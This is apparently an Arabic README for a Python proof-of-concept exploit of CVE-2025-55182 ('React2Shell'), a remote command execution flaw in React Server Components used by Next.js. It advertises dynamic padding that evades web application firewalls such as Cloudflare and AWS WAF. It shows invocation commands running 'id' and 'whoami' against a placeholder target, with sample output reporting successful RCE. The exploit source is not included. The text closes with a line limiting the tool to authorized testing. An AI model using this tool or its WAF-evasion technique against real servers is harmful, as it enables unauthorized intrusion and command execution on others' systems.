
PoC بلغة Python لـ CVE-2025-55182 (React2Shell) RCE في Next.js/React Server Components مع حشوة ديناميكية لتجاوز WAF لاختبار الأمان المصرح به.
أداة استغلال لغة بايثون نظيفة وموثوقة كإثبات مفهوم لـ CVE-2025-55182 (المعروفة باسم React2Shell)، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد في مكونات خادم React المستخدمة في Next.js (App Router) والأطر المماثلة.
تتضمن أداة الإثبات هذه حشوة ديناميكية لتجاوز جدران الحماية (WAF) لتفادي جدران الحماية الشائعة (مثل Cloudflare, AWS WAF وغيرها) التي تحد من الفحص العميق لأجسام الطلبات متعددة الأجزاء الكبيرة.
requestspip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
هذه الأداة مخصصة لاختبارات الأمان المصرح بها والبحث فقط.